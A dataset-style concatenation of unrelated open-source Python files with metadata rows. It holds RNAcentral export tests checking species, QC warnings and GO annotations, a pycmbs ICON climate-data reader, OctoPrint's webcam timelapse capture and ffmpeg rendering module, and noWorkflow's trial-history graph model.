("URS000006F31F_559292", 559292),
("URS0000614AD9_4896", 4896),
("URS0000AB68F4_511145", 511145),
("URS0000775421_224308", 224308),
("URS00009C1EFD_9595", None),
("URS0000BC697F_885580", None),
],
)
def test_correctly_assigns_popular_species(upi, ans):
result = []
if ans:
result = [{"attrib": {"name": "popular_species"}, "text": str(ans)}]
assert load_and_get_additional(upi, "popular_species") == result
@pytest.mark.parametrize(
"upi,problems",
[ # pylint: disable=E1101
("URS0000001EB3_9595", ["none"]),
("URS000014C3B0_7227", ["possible_contamination"]),
("URS0000010837_7227", ["incomplete_sequence", "possible_contamination"]),
("URS000052E2E9_289219", ["possible_contamination"]),
("URS00002411EE_10090", ["missing_rfam_match"]),
],
)
def test_it_correctly_build_qc_warnings(upi, problems):
# ans = [{'attrib': {'name': 'qc_warning'}, 'text': p} for p in problems]
val = [a["text"] for a in load_and_get_additional(upi, "qc_warning")]
assert sorted(val) == sorted(problems)
@pytest.mark.parametrize(
"upi,status",
[ # pylint: disable=E1101
("URS0000000006_1317357", False),
("URS000075D95B_9606", False),
("URS00008C5577_77133", False),
("URS0000001EB3_9595", False),
("URS000014C3B0_7227", True),
("URS0000010837_7227", True),
("URS000052E2E9_289219", True),
],
)
def test_it_correctly_assigns_qc_warning_found(upi, status):
assert load_and_get_additional(upi, "qc_warning_found") == [
{"attrib": {"name": "qc_warning_found"}, "text": str(status)},
]
@pytest.mark.parametrize(
"upi,status",
[ # pylint: disable=E1101
# ('URS0000A77400_9606', True),
("URS0000444F9B_559292", True),
("URS0000592212_7227", False),
# ('URS000071F071_7955', True),
# ('URS000071F4D6_7955', True),
("URS000075EAAC_9606", True),
("URS00007F81F8_511145", False),
("URS0000A16E25_198431", False),
("URS0000A7ED87_7955", True),
("URS0000A81C5E_9606", True),
("URS0000ABD87F_9606", True),
("URS0000D47880_3702", True),
],
)
def test_can_correctly_assign_coordinates(upi, status):
assert load_and_get_additional(upi, "has_genomic_coordinates") == [
{"attrib": {"name": "has_genomic_coordinates"}, "text": str(status)},
]
@pytest.mark.parametrize(
"upi",
[ # pylint: disable=E1101
"URS00004B0F34_562",
"URS00000ABFE9_562",
"URS0000049E57_562",
],
)
def test_does_not_produce_empty_rfam_warnings(upi):
assert load_and_get_additional(upi, "qc_warning") == [
{"attrib": {"name": "qc_warning"}, "text": "none"},
]
@pytest.mark.parametrize(
"upi,boost",
[ # pylint: disable=E1101
("URS0000B5D04E_1457030", 1),
("URS0000803319_904691", 1),
("URS00009ADB88_9606", 3),
("URS000049E122_9606", 2.5),
("URS000047450F_1286640", 0.0),
("URS0000143578_77133", 0.5),
("URS000074C6E6_7227", 2),
("URS00007B5259_3702", 2),
("URS00007E35EF_9606", 4),
("URS00003AF3ED_3702", 1.5),
],
)
def test_computes_valid_boost(upi, boost):
assert load_and_get_additional(upi, "boost") == [
{"attrib": {"name": "boost"}, "text": str(boost)}
]
@pytest.mark.parametrize(
"upi,pub_ids",
[ # pylint: disable=E1101
("URS0000BB15D5_9606", [512936, 527789]),
("URS000019E0CD_9606", [238832, 538386, 164929, 491042, 491041]),
],
)
def test_computes_pub_ids(upi, pub_ids):
val = sorted(int(a["text"]) for a in load_and_get_additional(upi, "pub_id"))
assert val == sorted(pub_ids)
@pytest.mark.xfail(reason="Changed how publications are fetched for now")
@pytest.mark.parametrize(
"upi,pmid",
[ # pylint: disable=E1101
("URS000026261D_9606", 27021683),
("URS0000614A9B_9606", 28111633),
],
)
def test_can_add_publications_from_go_annotations(upi, pmid):
val = {c["attrib"]["dbkey"] for c in load_and_get_cross_references(upi, "PUBMED")}
assert str(pmid) in val
@pytest.mark.parametrize(
"upi,qualifier,ans",
[ # pylint: disable=E1101
("URS000026261D_9606", "part_of", ["GO:0005615", "extracellular space"]),
(
"URS0000614A9B_9606",
"involved_in",
[
"GO:0010628",
"GO:0010629",
"GO:0035195",
"GO:0060045",
"positive regulation of gene expression",
"negative regulation of gene expression",
"gene silencing by miRNA",
"positive regulation of cardiac muscle cell proliferation",
],
),
],
)
def test_can_assign_go_annotations(upi, qualifier, ans):
val = {a["text"] for a in load_and_get_additional(upi, qualifier)}
assert sorted(val) == sorted(ans)
@pytest.mark.parametrize(
"upi,has",
[ # pylint: disable=E1101
("URS000026261D_9606", True),
("URS0000614A9B_9606", True),
("URS000019E0CD_9606", False),
("URS0000003085_7460", False),
],
)
def test_it_can_add_valid_annotations_flag(upi, has):
assert load_and_get_additional(upi, "has_go_annotations") == [
{"attrib": {"name": "has_go_annotations"}, "text": str(has)},
]
@pytest.mark.parametrize(
"upi,expected",
[ # pylint: disable=E1101
("URS0000160683_10090", ["BHF-UCL", "MGI"]),
("URS00002075FA_10116", ["BHF-UCL", "GOC"]),
("URS00001FCFC1_559292", ["SGD"]),
("URS0000759CF4_9606", ["Not Available"]),
],
)
def test_adds_field_for_source_of_go_annotations(upi, expected):
data = load_and_get_additional(upi, "go_annotation_source")
assert [d["text"] for d in data] == expected
@pytest.mark.parametrize(
"upi,expected",
[ # pylint: disable=E1101
("URS0000CABCE0_1970608", ["RF00005"]),
("URS0000C9A3EE_384", ["RF02541", "RF00005"]),
],
)
def test_assigns_rfam_ids_to_hits(upi, expected):
data = load_and_get_additional(upi, "rfam_id")
assert sorted(d["text"] for d in data) == sorted(expected)
@pytest.mark.parametrize(
"upi,expected",
[ # pylint: disable=E1101
("URS000020CEC2_9606", True),
("URS000026261D_9606", True),
("URS0000759CF4_9606", False),
("URS0000759CF4_9606", False),
],
)
def test_can_detect_if_has_interacting_proteins(upi, expected):
assert load_and_get_additional(upi, "has_interacting_proteins") == [
{"attrib": {"name": "has_interacting_proteins"}, "text": str(expected)}
]
@pytest.mark.parametrize(
"upi,expected",
[ # pylint: disable=E1101
(
"URS000075E072_9606",
{
"ENSG00000026025",
"ENSG00000074706",
"ENSG00000108064",
"ENSG00000108839",
"ENSG00000124593",
"ENSG00000135334",
"ENSG00000164330",
"ENSG00000174839",
"ENSG00000177189",
"ENSG00000183283",
"ENSG00000197646",
"12S-LOX",
"AFI1A",
"AKIRIN2",
"AL365205.1",
"ALOX12",
"B7-DC",
"Btdc",
"C6orf166",
"CD273",
"CLS",
"COE1",
"DAZAP2",
"DENND6A",
"EBF",
"EBF1",
"FAM116A",
"FLJ10342",
"FLJ34969",
"HU-3",
"IPCEF1",
"KIAA0058",
"KIAA0403",
"MRX19",
"OLF1",
"PD-L2",
"PDCD1LG2",
"PDL2",
"PIP3-E",
"RPS6KA3",
"RSK2",
"TCF6",
"TCF6L2",
"TFAM",
"VIM",
"bA574F11.2",
"dJ486L4.2",
},
),
("URS0000759CF4_9606", set()),
],
)
def test_can_protein_information_for_related_proteins(upi, expected):
data = load_and_get_additional(upi, "interacting_protein")
proteins = set(d["text"] for d in data)
assert proteins == expected
@pytest.mark.parametrize(
"upi,expected",
[ # pylint: disable=E1101
("URS000075E072_9606", {"PAR-CLIP"}),
("URS0000759CF4_9606", set()),
],
)
def test_can_methods_for_interactions(upi, expected):
data = load_and_get_additional(upi, "evidence_for_interaction")
evidence = set(d["text"] for d in data)
assert evidence == expected
@pytest.mark.parametrize(
"upi,flag",
[ # pylint: disable=E1101
("URS00009BEE76_9606", True),
("URS000019E0CD_9606", True),
("URS0000ABD7E8_9606", False),
],
)
def test_knows_has_crs(upi, flag):
data = load_and_get_additional(upi, "has_conserved_structure")
value = [d["text"] for d in data]
assert value == [str(flag)]
@pytest.mark.parametrize(
"upi,crs_ids",
[ # pylint: disable=E1101
(
"URS00009BEE76_9606",
{
"M1412625",
"M2510292",
"M0554312",
"M2543977",
"M2513462",
"M1849371",
"M1849369",
"M0554307",
},
),
("URS0000ABD7E8_9606", set([])),
],
)
def test_assigns_correct_crs_ids(upi, crs_ids):
data = load_and_get_additional(upi, "conserved_structure")
value = {d["text"] for d in data}
assert value == crs_ids
@pytest.mark.parametrize(
"upi,expected",
[ # pylint: disable=E1101
("URS0000A59F5E_7227", set()),
("URS0000014447_7240", {"ENA", "FlyBase", "miRBase", "Rfam"}),
("URS0000ABD7E8_9606", set()),
],
)
def test_assigns_correct_overlaps(upi, expected):
data = load_and_get_additional(upi, "overlaps_with")
value = {d["text"] for d in data}
assert value == expected
@pytest.mark.parametrize(
"upi,expected",
[ # pylint: disable=E1101
(
"URS0000A59F5E_7227",
{
"FlyBase",
"miRBase",
"Modomics",
"PDBe",
"RefSeq",
"Rfam",
"SILVA",
"snOPY",
"SRPDB",
},
),
("URS0000014447_7240", set()),
("URS0000ABD7E8_9606", set()),
],
)
def test_assigns_correct_no_overlaps(upi, expected):
data = load_and_get_additional(upi, "no_overlaps_with")
value = {d["text"] for d in data}
assert value == expected
@pytest.mark.parametrize(
"upi,expected",
[ # pylint: disable=E1101
(
"URS000026261D_9606",
{
"URS00005EB21E_9606",
"URS0000142654_9606",
"URS0000A91D1A_9606",
"URS000029E633_9606",
"URS00001D61C5_9606",
"URS00007D759B_9606",
"URS00002C6CC0_9606",
"URS00008BBA89_9606",
"URS000008C8EB_9606",
"URS0000A887DA_9606",
"URS000002964A_9606",
"URS0000304D5D_9606",
"URS00009C5E9B_9606",
"URS00000F38DD_9606",
"URS0000141778_9606",
"URS000044954E_9606",
"URS0000D61BD6_9606",
"URS0000AA0D63_9606",
"URS000035AC9C_9606",
"URS00007BF182_9606",
"URS000077BE2A_9606",
"URS0000543B4D_9606",
"URS0000D63D56_9606",
"URS00004E64F9_9606",
"URS0000264D7F_9606",
"URS00008C22F5_9606",
"URS00004CDF42_9606",
"URS00001ED6BE_9606",
"URS00002989CF_9606",
"URS000076891D_9606",
"URS00002F49FD_9606",
"URS000017366C_9606",
"URS0000783AD8_9606",
"URS00007716E5_9606",
"URS00004DBD55_9606",
"URS0000499E31_9606",
"URS0000318782_9606",
"URS00001118C6_9606",
"URS000009D1B1_9606",
"URS00000CE0D1_9606",
"URS0000784209_9606",
"URS000040AD32_9606",
"URS00001F136D_9606",
"URS00004942CA_9606",
"URS00001A182D_9606",
"URS00007836D4_9606",
"URS000077EF2F_9606",
"ENSG00000157306",
"ENSG00000177822",
"ENSG00000196756",
"ENSG00000204584",
"ENSG00000206337",
"ENSG00000214106",
"ENSG00000214548",
"ENSG00000225138",
"ENSG00000225733",
"ENSG00000229807",
"ENSG00000231074",
"ENSG00000233937",
"ENSG00000234456",
"ENSG00000235423",
"ENSG00000235499",
"ENSG00000244300",
"ENSG00000245532",
"ENSG00000247556",
"ENSG00000248092",
"ENSG00000249087",
"ENSG00000251209",
"ENSG00000251562",
"ENSG00000253352",
"ENSG00000255108",
"ENSG00000255175",
"ENSG00000255717",
"ENSG00000256732",
"ENSG00000257698",
"ENSG00000260032",
"ENSG00000260276",
"ENSG00000260423",
"ENSG00000261409",
"ENSG00000261428",
"ENSG00000262877",
"ENSG00000266896",
"ENSG00000267078",
"ENSG00000267263",
"ENSG00000267322",
"ENSG00000268027",
"ENSG00000269821",
"ENSG00000270006",
"ENSG00000270066",
"ENSG00000272512",
"ENSG00000272918",
"ENSG00000273001",
"ENSG00000274895",
"ENSG00000275413",
"ENSG00000214297",
"ENSG00000218980",
"ENSG00000219507",
"ENSG00000224631",
"ENSG00000225093",
"ENSG00000225674",
"ENSG00000225972",
"ENSG00000226564",
"ENSG00000226752",
"ENSG00000227081",
"ENSG00000227347",
"ENSG00000227777",
"ENSG00000228232",
"ENSG00000228834",
"ENSG00000229473",
"ENSG00000231752",
"ENSG00000232282",
"ENSG00000232573",
"ENSG00000234975",
"ENSG00000235095",
"ENSG00000237264",
"ENSG00000237350",
"ENSG00000237999",
"ENSG00000239218",
"ENSG00000242294",
"ENSG00000242299",
"ENSG00000243265",
"ENSG00000244535",
"ENSG00000247627",
"ENSG00000256211",
"ENSG00000257199",
"ENSG00000257307",
"ENSG00000257379",
"ENSG00000259751",
"ENSG00000259758",
"ENSG00000261864",
"ENSG00000264772",
"ENSG00000267482",
"ENSG00000269374",
"ENSG00000269378",
"ENSG00000271525",
"ENSG00000272578",
"ENSG00000277358",
"ENSG00000279978",
"ENSG00000142396",
"ENSG00000152117",
"ENSG00000172974",
"ENSG00000175841",
"ENSG00000182310",
"ENSG00000183298",
"ENSG00000188460",
"ENSG00000196204",
"ENSG00000198744",
"ENSG00000204623",
},
),
("URS0000759CF4_9606", set()),
],
)
def test_assigns_correct_interacting_rnas(upi, expected):
data = load_and_get_additional(upi, "interacting_rna")
value = {d["text"] for d in data}
assert value == expected
@pytest.mark.parametrize(
"upi,flag",
[
("URS000047BD19_77133", True),
("URS00005B9F86_77133", True),
("URS0000239F73_77133", True),
("URS0000DF5B98_34613", False),
],
)
def test_knows_if_has_secondary_structure(upi, flag):
assert load_and_get_additional(upi, "has_secondary_structure") == [
{"attrib": {"name": "has_secondary_structure"}, "text": str(flag)}
]
@pytest.mark.parametrize(
"upi,models",
[
("URS000047BD19_77133", ["d.16.b.S.aureus.GEN"]),
("URS00005B9F86_77133", ["d.16.b.S.pneumoniae"]),
("URS0000239F73_77133", ["d.16.b.O.agardhii"]),
("URS0000DF5B98_34613", []),
],
)
def test_sets_valid_model_name(upi, models):
ans = [{"attrib": {"name": "secondary_structure_model"}, "text": m} for m in models]
data = load_and_get_additional(upi, "secondary_structure_model")
assert data == ans
@pytest.mark.parametrize(
"upi,url",
[
(
"URS000075A546_9606",
"http://www.mirbase.org/cgi-bin/mirna_entry.pl?acc=MI0031512",
),
],
)
def test_computes_correct_urls(upi, url):
data = load_and_get_additional(upi, "secondary_structure_model")
expected = [{"attrib": {"name": "url"}, "text": url}]
assert data == expected
| apache-2.0 | 5,211,378,643,536,435,000 | 30.856533 | 134 | 0.542435 | false |
pygeo/pycmbs | pycmbs/icon.py | 1 | 3243 | # -*- coding: utf-8 -*-
"""
This file is part of pyCMBS.
(c) 2012- Alexander Loew
For COPYING and LICENSE details, please refer to the LICENSE file
"""
from pycmbs.data import Data
import os
from pycmbs.netcdf import *
import numpy as np
class Icon(Data):
"""
Main class for ICON data handling
"""
def __init__(self, filename, gridfile, varname, read=False, **kwargs):
"""
Parameters
----------
filename : str
filename of data file
gridfile : str
filename of grid definition file
varname : str
name of variable to handle
read : bool
specify if data should be read immediately
"""
Data.__init__(self, filename, varname, **kwargs)
self.gridfile = gridfile
self.gridtype = 'unstructured'
#---
def read(self, time_var='time'):
"""
This is a special routine for reading data from ICON structure
a bit redundant to Data.read()
Parameters
----------
time_var : str
name of time variable (default='time')
"""
print('Reading ICON data ...')
if not os.path.exists(self.filename):
raise ValueError('File not existing: %s' % self.filename)
if not os.path.exists(self.gridfile):
raise ValueError('File not existing: %s' % self.gridfile)
#--- time variable
self.time_var = time_var
#--- data field
# [time,ncell]
self.data = self.read_netcdf(self.varname)
nt, ncell = self.data.shape
# reshape so we have a common 3D structure like always in pyCMBS
self.data = self.data.reshape((nt, 1, ncell))
if self.data is None:
raise ValueError('The data in the file %s is not existing. \
This must not happen!' % self.filename)
if self.scale_factor is None:
raise ValueError('The scale_factor for file %s is NONE, \
this must not happen!' % self.filename)
self.data *= self.scale_factor
#--- read lat/lon
File = NetCDFHandler()
File.open_file(self.gridfile, 'r')
# grid cell center coordinates
self.lon = File.get_variable('clon') * 180. / np.pi
self.lat = File.get_variable('clat') * 180. / np.pi
self.ncell = len(self.lon)
self.vlon = File.get_variable('clon_vertices') * 180. / np.pi
self.vlat = File.get_variable('clat_vertices') * 180. / np.pi
File.close()
#--- read time variable
if self.time_var is not None:
# returns either None or a masked array
self.time = self.read_netcdf(self.time_var)
if hasattr(self.time, 'mask'):
self.time = self.time.data
else:
self.time is None
if self.time is not None:
if self.time.ndim != 1:
# remove singletone dimensions
self.time = self.time.flatten()
else:
self.time = None
#--- determine time --> convert to python timestep
if self.time is not None:
self.set_time()
| mit | 4,772,429,266,076,823,000 | 28.752294 | 74 | 0.547641 | false |
fastbot3d/Octoprint | src/octoprint/timelapse.py | 1 | 12781 | # coding=utf-8
__author__ = "Gina Häußge <[email protected]>"
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
import logging
import os
import threading
import urllib
import time
import subprocess
import fnmatch
import datetime
import sys
import shutil
import octoprint.util as util
from octoprint.settings import settings
from octoprint.events import eventManager, Events
import sarge
# currently configured timelapse
current = None
def getFinishedTimelapses():
files = []
basedir = settings().getBaseFolder("timelapse")
for osFile in os.listdir(basedir):
if not fnmatch.fnmatch(osFile, "*.mpg"):
continue
statResult = os.stat(os.path.join(basedir, osFile))
files.append({
"name": osFile,
"size": util.getFormattedSize(statResult.st_size),
"bytes": statResult.st_size,
"date": util.getFormattedDateTime(datetime.datetime.fromtimestamp(statResult.st_ctime))
})
return files
validTimelapseTypes = ["off", "timed", "zchange"]
updateCallbacks = []
def registerCallback(callback):
if not callback in updateCallbacks:
updateCallbacks.append(callback)
def unregisterCallback(callback):
if callback in updateCallbacks:
updateCallbacks.remove(callback)
def notifyCallbacks(timelapse):
if timelapse is None:
config = None
else:
config = timelapse.configData()
for callback in updateCallbacks:
try: callback.sendTimelapseConfig(config)
except: logging.getLogger(__name__).exception("Exception while pushing timelapse configuration")
def configureTimelapse(config=None, persist=False):
global current
if config is None:
config = settings().get(["webcam", "timelapse"])
if current is not None:
current.unload()
type = config["type"]
postRoll = 0
if "postRoll" in config:
postRoll = config["postRoll"]
if type is None or "off" == type:
current = None
elif "zchange" == type:
current = ZTimelapse(postRoll=postRoll)
elif "timed" == type:
interval = 10
if "options" in config and "interval" in config["options"]:
interval = config["options"]["interval"]
current = TimedTimelapse(postRoll=postRoll, interval=interval)
notifyCallbacks(current)
if persist:
settings().set(["webcam", "timelapse"], config)
settings().save()
class Timelapse(object):
def __init__(self, postRoll=0):
self._logger = logging.getLogger(__name__)
self._imageNumber = None
self._inTimelapse = False
self._gcodeFile = None
self._postRoll = postRoll
self._postRollStart = None
self._onPostRollDone = None
self._captureDir = settings().getBaseFolder("timelapse_tmp")
self._movieDir = settings().getBaseFolder("timelapse")
self._snapshotUrl = settings().get(["webcam", "snapshot"])
self._fps = 25
self._renderThread = None
self._captureMutex = threading.Lock()
# subscribe events
eventManager().subscribe(Events.PRINT_STARTED, self.onPrintStarted)
eventManager().subscribe(Events.PRINT_FAILED, self.onPrintDone)
eventManager().subscribe(Events.PRINT_DONE, self.onPrintDone)
eventManager().subscribe(Events.PRINT_RESUMED, self.onPrintResumed)
for (event, callback) in self.eventSubscriptions():
eventManager().subscribe(event, callback)
def postRoll(self):
return self._postRoll
def unload(self):
if self._inTimelapse:
self.stopTimelapse(doCreateMovie=False)
# unsubscribe events
eventManager().unsubscribe(Events.PRINT_STARTED, self.onPrintStarted)
eventManager().unsubscribe(Events.PRINT_FAILED, self.onPrintDone)
eventManager().unsubscribe(Events.PRINT_DONE, self.onPrintDone)
eventManager().unsubscribe(Events.PRINT_RESUMED, self.onPrintResumed)
for (event, callback) in self.eventSubscriptions():
eventManager().unsubscribe(event, callback)
def onPrintStarted(self, event, payload):
"""
Override this to perform additional actions upon start of a print job.
"""
self.startTimelapse(payload["file"])
def onPrintDone(self, event, payload):
"""
Override this to perform additional actions upon the stop of a print job.
"""
self.stopTimelapse(success=(event==Events.PRINT_DONE))
def onPrintResumed(self, event, payload):
"""
Override this to perform additional actions upon the pausing of a print job.
"""
if not self._inTimelapse:
self.startTimelapse(payload["file"])
def eventSubscriptions(self):
"""
Override this method to subscribe to additional events by returning an array of (event, callback) tuples.
Events that are already subscribed:
* PrintStarted - self.onPrintStarted
* PrintResumed - self.onPrintResumed
* PrintFailed - self.onPrintDone
* PrintDone - self.onPrintDone
"""
return []
def configData(self):
"""
Override this method to return the current timelapse configuration data. The data should have the following
form:
type: "<type of timelapse>",
options: { <additional options> }
"""
return None
def startTimelapse(self, gcodeFile):
self._logger.debug("Starting timelapse for %s" % gcodeFile)
self.cleanCaptureDir()
self._imageNumber = 0
self._inTimelapse = True
self._gcodeFile = os.path.basename(gcodeFile)
def stopTimelapse(self, doCreateMovie=True, success=True):
self._logger.debug("Stopping timelapse")
self._inTimelapse = False
def resetImageNumber():
self._imageNumber = None
def createMovie():
self._renderThread = threading.Thread(target=self._createMovie, kwargs={"success": success})
self._renderThread.daemon = True
self._renderThread.start()
def resetAndCreate():
resetImageNumber()
createMovie()
if self._postRoll > 0:
self._postRollStart = time.time()
if doCreateMovie:
self._onPostRollDone = resetAndCreate
else:
self._onPostRollDone = resetImageNumber
self.processPostRoll()
else:
self._postRollStart = None
if doCreateMovie:
resetAndCreate()
else:
resetImageNumber()
def processPostRoll(self):
pass
def captureImage(self):
if self._captureDir is None:
self._logger.warn("Cannot capture image, capture directory is unset")
return
if self._imageNumber is None:
self._logger.warn("Cannot capture image, image number is unset")
return
with self._captureMutex:
filename = os.path.join(self._captureDir, "tmp_%05d.jpg" % self._imageNumber)
self._imageNumber += 1
self._logger.debug("Capturing image to %s" % filename)
captureThread = threading.Thread(target=self._captureWorker, kwargs={"filename": filename})
captureThread.daemon = True
captureThread.start()
return filename
def _captureWorker(self, filename):
eventManager().fire(Events.CAPTURE_START, {"file": filename})
try:
urllib.urlretrieve(self._snapshotUrl, filename)
self._logger.debug("Image %s captured from %s" % (filename, self._snapshotUrl))
except:
self._logger.exception("Could not capture image %s from %s, decreasing image counter again" % (filename, self._snapshotUrl))
with self._captureMutex:
if self._imageNumber is not None and self._imageNumber > 0:
self._imageNumber -= 1
eventManager().fire(Events.CAPTURE_DONE, {"file": filename})
def _createMovie(self, success=True):
ffmpeg = settings().get(["webcam", "ffmpeg"])
bitrate = settings().get(["webcam", "bitrate"])
if ffmpeg is None or bitrate is None:
self._logger.warn("Cannot create movie, path to ffmpeg or desired bitrate is unset")
return
input = os.path.join(self._captureDir, "tmp_%05d.jpg")
if success:
output = os.path.join(self._movieDir, "%s_%s.mpg" % (os.path.splitext(self._gcodeFile)[0], time.strftime("%Y%m%d%H%M%S")))
else:
output = os.path.join(self._movieDir, "%s_%s-failed.mpg" % (os.path.splitext(self._gcodeFile)[0], time.strftime("%Y%m%d%H%M%S")))
# prepare ffmpeg command
command = [
ffmpeg, '-loglevel', 'error', '-i', input, '-vcodec', 'mpeg2video', '-pix_fmt', 'yuv420p', '-r', str(self._fps), '-y', '-b:v', bitrate,
'-f', 'vob']
filters = []
# flip video if configured
if settings().getBoolean(["webcam", "flipH"]):
filters.append('hflip')
if settings().getBoolean(["webcam", "flipV"]):
filters.append('vflip')
# add watermark if configured
watermarkFilter = None
if settings().getBoolean(["webcam", "watermark"]):
watermark = os.path.join(os.path.dirname(__file__), "static", "img", "watermark.png")
if sys.platform == "win32":
# Because ffmpeg hiccups on windows' drive letters and backslashes we have to give the watermark
# path a special treatment. Yeah, I couldn't believe it either...
watermark = watermark.replace("\\", "/").replace(":", "\\\\:")
watermarkFilter = "movie=%s [wm]; [%%(inputName)s][wm] overlay=10:main_h-overlay_h-10" % watermark
filterstring = None
if len(filters) > 0:
if watermarkFilter is not None:
filterstring = "[in] %s [postprocessed]; %s [out]" % (",".join(filters), watermarkFilter % {"inputName": "postprocessed"})
else:
filterstring = "[in] %s [out]" % ",".join(filters)
elif watermarkFilter is not None:
filterstring = watermarkFilter % {"inputName": "in"} + " [out]"
if filterstring is not None:
self._logger.debug("Applying videofilter chain: %s" % filterstring)
command.extend(["-vf", sarge.shell_quote(filterstring)])
# finalize command with output file
self._logger.debug("Rendering movie to %s" % output)
command.append("\"" + output + "\"")
eventManager().fire(Events.MOVIE_RENDERING, {"gcode": self._gcodeFile, "movie": output, "movie_basename": os.path.basename(output)})
command_str = " ".join(command)
self._logger.debug("Executing command: %s" % command_str)
try:
p = sarge.run(command_str, stderr=sarge.Capture())
if p.returncode == 0:
eventManager().fire(Events.MOVIE_DONE, {"gcode": self._gcodeFile, "movie": output, "movie_basename": os.path.basename(output)})
else:
returncode = p.returncode
stderr_text = p.stderr.text
self._logger.warn("Could not render movie, got return code %r: %s" % (returncode, stderr_text))
eventManager().fire(Events.MOVIE_FAILED, {"gcode": self._gcodeFile, "movie": output, "movie_basename": os.path.basename(output), "returncode": returncode, "error": stderr_text})
except:
self._logger.exception("Could not render movie due to unknown error")
eventManager().fire(Events.MOVIE_FAILED, {"gcode": self._gcodeFile, "movie": output, "movie_basename": os.path.basename(output), "returncode": 255, "error": "Unknown error"})
def cleanCaptureDir(self):
if not os.path.isdir(self._captureDir):
self._logger.warn("Cannot clean capture directory, it is unset")
return
for filename in os.listdir(self._captureDir):
if not fnmatch.fnmatch(filename, "*.jpg"):
continue
os.remove(os.path.join(self._captureDir, filename))
class ZTimelapse(Timelapse):
def __init__(self, postRoll=0):
Timelapse.__init__(self, postRoll=postRoll)
self._logger.debug("ZTimelapse initialized")
def eventSubscriptions(self):
return [
("ZChange", self._onZChange)
]
def configData(self):
return {
"type": "zchange"
}
def processPostRoll(self):
Timelapse.processPostRoll(self)
filename = os.path.join(self._captureDir, "tmp_%05d.jpg" % self._imageNumber)
self._imageNumber += 1
with self._captureMutex:
self._captureWorker(filename)
for i in range(self._postRoll * self._fps):
newFile = os.path.join(self._captureDir, "tmp_%05d.jpg" % (self._imageNumber))
self._imageNumber += 1
shutil.copyfile(filename, newFile)
if self._onPostRollDone is not None:
self._onPostRollDone()
def _onZChange(self, event, payload):
self.captureImage()
class TimedTimelapse(Timelapse):
def __init__(self, postRoll=0, interval=1):
Timelapse.__init__(self, postRoll=postRoll)
self._interval = interval
if self._interval < 1:
self._interval = 1 # force minimum interval of 1s
self._timerThread = None
self._logger.debug("TimedTimelapse initialized")
def interval(self):
return self._interval
def configData(self):
return {
"type": "timed",
"options": {
"interval": self._interval
}
}
def onPrintStarted(self, event, payload):
Timelapse.onPrintStarted(self, event, payload)
if self._timerThread is not None:
return
self._timerThread = threading.Thread(target=self._timerWorker)
self._timerThread.daemon = True
self._timerThread.start()
def onPrintDone(self, event, payload):
Timelapse.onPrintDone(self, event, payload)
self._timerThread = None
def _timerWorker(self):
self._logger.debug("Starting timer for interval based timelapse")
while self._inTimelapse or (self._postRollStart and time.time() - self._postRollStart <= self._postRoll * self._fps):
self.captureImage()
time.sleep(self._interval)
if self._postRollStart is not None and self._onPostRollDone is not None:
self._onPostRollDone()
self._postRollStart = None
| agpl-3.0 | 1,734,288,371,365,720,600 | 29.941889 | 181 | 0.707098 | false |
paopao74cn/noworkflow | capture/noworkflow/now/models/history.py | 1 | 5563 | # Copyright (c) 2015 Universidade Federal Fluminense (UFF)
# Copyright (c) 2015 Polytechnic Institute of New York University.
# This file is part of noWorkflow.
# Please, consult the license terms in the LICENSE file.
from __future__ import (absolute_import, print_function,
division, unicode_literals)
from collections import defaultdict, OrderedDict
from .model import Model
from ..graphs.history_graph import HistoryGraph
from ..utils import calculate_duration, FORMAT
from ..persistence import row_to_dict
from ..persistence import persistence as pers
class History(Model):
""" This model represents the workflow evolution history
It is possible to filter the evolution history by selecting the script:
history.script = "script1.py"
The list of scripts can be accessed by:
history.scripts()
It is also possible to filter the evolution history by selecting the
trial status:
history.execution = "finished"
The list of status are:
finished: show only finished trials
unfinished: show only unfinished trials
backup: show only backup trials
The default option for both filters is "*", which means that all trials
appear in the history
history.script = "*"
history.execution = "*"
You can change the graph width and height by the variables:
history.graph.width = 600
history.graph.height = 200
"""
DEFAULT = {
'graph.width': 700,
'graph.height': 300,
'script': '*',
'execution': '*',
'data': {},
}
REPLACE = {
'graph_width': 'graph.width',
'graph_height': 'graph.height',
}
def __init__(self, **kwargs):
super(History, self).__init__(**kwargs)
self.graph = HistoryGraph()
self.initialize_default(kwargs)
self.execution_options = ["*", "finished", "unfinished", "backup"]
def scripts(self):
""" Returns the list of scripts used for trials """
return {s[0].rsplit('/', 1)[-1] for s in pers.distinct_scripts()}
def graph_data(self, script="*", execution="*"):
""" Prepares evolution history as a dict """
if self.script != "*" and script == "*":
script = self.script
if self.execution != "*" and execution == "*":
execution = self.execution
key = (script, execution)
if key in self.data:
return self.data[key]
nodes, edges = [], []
result = {'nodes': nodes, 'edges': edges}
id_map, children = {}, defaultdict(list)
scripts, order = defaultdict(list), OrderedDict()
# Filter nodes and adds to dicts
tid = 0
for trial in map(row_to_dict, pers.load('trial', order="start")):
different_script = (trial['script'] != script)
finished = trial['finish']
unfinished = not finished and trial['run']
backup = not finished and not trial['run']
if script != '*' and different_script:
continue
if execution == 'finished' and not finished:
continue
if execution == 'unfinished' and not unfinished:
continue
if execution == 'backup' and not backup:
continue
trial_id = trial["id"]
trial["level"] = 0
trial["status"] = "Finished" if trial["finish"] else "Unfinished"
if not trial['run']:
trial["status"] = "Backup"
trial["tooltip"] = """
<b>{script}</b><br>
{status}<br>
Start: {start}<br>
Finish: {finish}
""".format(**trial)
if trial['finish']:
duration = calculate_duration(trial)
trial["tooltip"] += """
<br>
Duration: {duration}ns
""".format(duration=duration)
trial['duration'] = duration
id_map[trial_id] = tid
scripts[trial['script']].append(trial)
nodes.append(trial)
tid += 1
# Create edges
for trial in reversed(nodes):
trial_id, parent_id = trial["id"], trial["parent_id"]
if parent_id and parent_id in id_map:
edges.append({
'source': id_map[trial_id],
'target': id_map[parent_id],
'right': 1,
'level': 0
})
children[parent_id].append(trial_id)
order[trial['script']] = 1
# Set position
level = 0
for script in order:
last = level
for trial in scripts[script]:
trial_id, parent_id = trial["id"], trial["parent_id"]
if parent_id and parent_id in id_map:
parent = nodes[id_map[parent_id]]
if children[parent_id].index(trial_id) > 0:
trial["level"] = last
last += 1
else:
trial["level"] = parent["level"]
level = max(level, trial["level"] + 1)
else:
trial["level"] = level
level += 1
last += 1
self.data[key] = result
return result
def _repr_html_(self):
""" Display d3 graph on ipython notebook """
return self.graph._repr_html_(history=self) | mit | -6,656,497,510,584,656,000 | 32.926829 | 77 | 0.528132 | false |
